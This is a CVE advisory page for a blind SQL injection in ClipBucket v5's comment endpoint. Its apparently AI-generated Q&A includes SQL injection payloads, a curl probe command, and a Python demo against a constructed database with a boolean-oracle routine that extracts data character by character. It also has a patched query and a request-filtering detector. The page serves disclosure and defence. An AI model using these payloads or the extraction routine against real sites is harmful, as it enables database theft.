CVE-2026-21875
Blind SQL Injection in ClipBucket v5 Channel Comment Function
Publication date: 2026-01-08
Last updated on: 2026-01-08
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
| EPSS metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| clipbucket | clipbucket | to 5.5.2 (inc) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-21875 is a critical blind SQL injection vulnerability in the ClipBucket v5 video sharing platform, specifically in the channel comment feature. The obj_id parameter of a POST request to /actions/ajax.php is used directly in an SQL query without validation or sanitization, so a value such as `1' or 1=1-- -` is interpreted as SQL rather than as an identifier and changes what the query matches. The injection is boolean-based and blind: the application never returns query output, but an attacker can infer database contents one true/false question at a time from differences in the response. It can be exploited remotely without authentication if anonymous comments are enabled, and by any authenticated user otherwise. [1]
How can this vulnerability impact me?
This vulnerability can have severe impacts including unauthorized extraction of sensitive database information, compromising the confidentiality, integrity, and availability of the system. Attackers can remotely exploit this vulnerability without any privileges if anonymous comments are enabled, potentially leading to full database compromise and data leakage. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Because the injection is boolean-based, probe with a pair of requests that differ only in the truth of the injected condition and compare the responses; a single `1=1` payload on its own proves little. For example, with curl (replace the host with your own instance, and only test systems you are authorized to test):

```shell
curl -s -X POST --data-urlencode "obj_id=1' AND 1=1-- -" https://your-clipbucket-site/actions/ajax.php
```

then repeat with `1=2` in place of `1=1`. If the two responses differ in status, length or content while a plain `obj_id=1` behaves like the `1=1` case, the parameter is being evaluated as SQL. Two caveats: `--data-urlencode` is needed so the quote and spaces in the payload are encoded properly, and the comment action expects further form fields alongside obj_id that this page does not list, so a request missing them may be rejected before the query runs and an absent difference is not proof of absence. Automated SQL injection tools can be pointed at the same endpoint and parameter. The quickest non-intrusive check is to compare the installed ClipBucket version against the affected range above. [1]
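The mechanism described in the first answer and the true/false probing described in the detection answer, shown together as an added example that is not ClipBucket's code (the page does not show the project's query or schema): a constructed SQLite database stands in for MySQL, and the table and column names, the quoting of obj_id inside the query and the `-- -` comment terminator are assumptions taken from the payload quoted on this page. `count_comments_vulnerable` splices obj_id into the query; `boolean_oracle` turns the row-count difference into a yes/no answer, and `extract_via_oracle` recovers a username from nothing but those answers, which is what "blind" means in practice. `count_comments_fixed` beside it shows the fix: validate the identifier and bind it as a parameter.

```python
import re
import sqlite3

# Added example modelling CVE-2026-21875; SQLite stands in for MySQL and the
# schema below is constructed (table/column names are assumptions).


def make_db():
    """Constructed in-memory database with a comments table and a users table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE comments (comment_id INTEGER PRIMARY KEY, type TEXT,
                               obj_id INTEGER, comment TEXT);
        INSERT INTO comments (type, obj_id, comment) VALUES
            ('c', 1, 'first'), ('c', 1, 'second'), ('c', 2, 'third');
        CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash');
    """)
    return con


def count_comments_vulnerable(con, obj_id):
    """Vulnerable pattern (assumed): the request value is spliced into a quoted literal."""
    sql = f"SELECT COUNT(*) FROM comments WHERE type='c' AND obj_id='{obj_id}'"
    return con.execute(sql).fetchone()[0]


def count_comments_fixed(con, obj_id):
    """Hardened form: allow-list the identifier's shape, then bind it as a parameter."""
    if not (isinstance(obj_id, str) and re.fullmatch(r"[0-9]{1,10}", obj_id)):
        raise ValueError("obj_id must be a numeric identifier")
    sql = "SELECT COUNT(*) FROM comments WHERE type='c' AND obj_id=?"
    return con.execute(sql, (int(obj_id),)).fetchone()[0]


def fixed_rejects(con, obj_id):
    """True if the hardened function refuses the value."""
    try:
        count_comments_fixed(con, obj_id)
    except ValueError:
        return True
    return False


def boolean_oracle(con, condition):
    """One blind question: does `condition` hold? The attacker never sees query
    output, only whether the comment lookup for object 1 still returns rows."""
    payload = f"1' AND ({condition})-- -"
    return count_comments_vulnerable(con, payload) > 0


def extract_via_oracle(con, subquery, max_len=32):
    """Recover a string one printable character at a time using only the oracle.
    MySQL would use ASCII()/ORD() where SQLite uses UNICODE(); the idea is the same."""
    result = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            if boolean_oracle(con, f"UNICODE(SUBSTR(({subquery}),{pos},1))={code}"):
                result += chr(code)
                break
        else:
            break  # no printable character matched: end of string reached
    return result


if __name__ == "__main__":
    db = make_db()
    print("plain obj_id=1 ->", count_comments_vulnerable(db, "1"))
    print("obj_id=1' or 1=1-- - ->", count_comments_vulnerable(db, "1' or 1=1-- -"))
    print("extracted via oracle ->", extract_via_oracle(db, "SELECT username FROM users WHERE userid=1"))
    print("fixed version rejects payload ->", fixed_rejects(db, "1' or 1=1-- -"))
```

The `1=1` / `1=2` pair from the detection answer is exactly `boolean_oracle(db, "1=1")` versus `boolean_oracle(db, "1=2")`; everything `extract_via_oracle` does is that comparison repeated with a different condition each time.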
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include: 1) Disable anonymous comments if enabled; exploitation then requires an account, which raises the bar and leaves an audit trail but does not remove the flaw. 2) Restrict access to /actions/ajax.php with care: it is a shared front-end dispatcher, so blocking it outright breaks other features, and a rule scoped to the vulnerable parameter is the practical option. 3) Monitor and block POST requests to /actions/ajax.php whose obj_id value is not a plain numeric identifier; an allow-list on the expected format is more reliable than matching SQL keywords, which attackers evade with comment or encoding tricks. 4) Apply the patch: the vulnerability was fixed in ClipBucket v5.5.2 build #191, so 5.5.2 builds before #191 and all earlier v5 releases remain affected; update to #191 or later. Steps 1 to 3 reduce exposure until the update is applied; only the patch removes the vulnerability. [1]
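Step 3 above as an added example, not part of this page or of ClipBucket: a Python rule that inspects POST bodies sent to /actions/ajax.php and flags any obj_id that is not a plain numeric identifier, beside a keyword blocklist for comparison. The JSON-lines log format and the requests in it are constructed (ClipBucket and stock web servers do not log request bodies; in practice this logic runs in a WAF or reverse-proxy plugin that sees the body), the `comment` field name is made up, and the expectation that obj_id is numeric is an assumption.

```python
import json
import re
from urllib.parse import parse_qs

# Added example. Constructed request log: JSON lines carrying the raw POST
# body, as a proxy plugin might record them. Sources are documentation IPs.
SAMPLE_LOG = """\
{"line": 1, "src": "203.0.113.5", "method": "POST", "path": "/actions/ajax.php", "body": "obj_id=42&comment=nice+video"}
{"line": 2, "src": "198.51.100.7", "method": "POST", "path": "/actions/ajax.php", "body": "obj_id=1%27+or+1%3D1--+-&comment=x"}
{"line": 3, "src": "198.51.100.7", "method": "POST", "path": "/actions/ajax.php", "body": "obj_id=1%27%2F**%2FOR%2F**%2F1%3D1--+-&comment=x"}
{"line": 4, "src": "198.51.100.7", "method": "POST", "path": "/actions/ajax.php", "body": "obj_id=1&obj_id=1%27+AND+1%3D1--+-&comment=x"}
{"line": 5, "src": "192.0.2.9", "method": "GET", "path": "/actions/ajax.php", "body": ""}
"""

# Allow-list: the shape a legitimate object identifier is expected to have (assumption).
OBJ_ID_OK = re.compile(r"[0-9]{1,10}")
# Keyword blocklist, shown only to demonstrate why it is the weaker choice.
NAIVE_BLOCKLIST = re.compile(r"'\s+(or|and)\s+|union\s+select", re.IGNORECASE)


def parse_log(text):
    """Parse the JSON-lines log into request dicts."""
    return [json.loads(raw) for raw in text.splitlines() if raw.strip()]


def obj_id_values(entry):
    """All obj_id values in the form body (a list, so duplicates are visible)."""
    return parse_qs(entry["body"], keep_blank_values=True).get("obj_id", [])


def check_request(entry):
    """Return a reason to block the request, or None if it looks legitimate."""
    if entry["method"] != "POST" or entry["path"] != "/actions/ajax.php":
        return None
    values = obj_id_values(entry)
    if not values:
        return None
    if len(values) > 1:
        return "multiple obj_id values (parameter pollution)"
    if not OBJ_ID_OK.fullmatch(values[0]):
        return f"non-numeric obj_id: {values[0]!r}"
    return None


def naive_blocklist_hit(entry):
    """Keyword matching: catches the textbook payload, misses /**/ whitespace evasion."""
    return any(NAIVE_BLOCKLIST.search(v) for v in obj_id_values(entry))


def scan_log(text):
    """Apply check_request to every entry; returns (line, src, reason) for each hit."""
    flagged = []
    for entry in parse_log(text):
        reason = check_request(entry)
        if reason:
            flagged.append((entry["line"], entry["src"], reason))
    return flagged


if __name__ == "__main__":
    for line, src, reason in scan_log(SAMPLE_LOG):
        print(f"line {line} from {src}: {reason}")
    for entry in parse_log(SAMPLE_LOG):
        print(f"line {entry['line']}: blocklist hit={naive_blocklist_hit(entry)}, "
              f"allow-list verdict={check_request(entry)}")
```

Line 3 is the instructive case: the blocklist sees no whitespace around `OR` and passes it, while the allow-list rejects it simply because it is not a number. Line 4 shows why the rule reads all values of the parameter rather than the first one.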
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
This vulnerability allows attackers to perform blind SQL injection attacks that can lead to unauthorized access and extraction of sensitive database information. Such a compromise of sensitive data can result in violations of data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and breaches. Therefore, exploitation of this vulnerability could lead to non-compliance with these standards due to potential data breaches and loss of confidentiality, integrity, and availability of protected data. [1]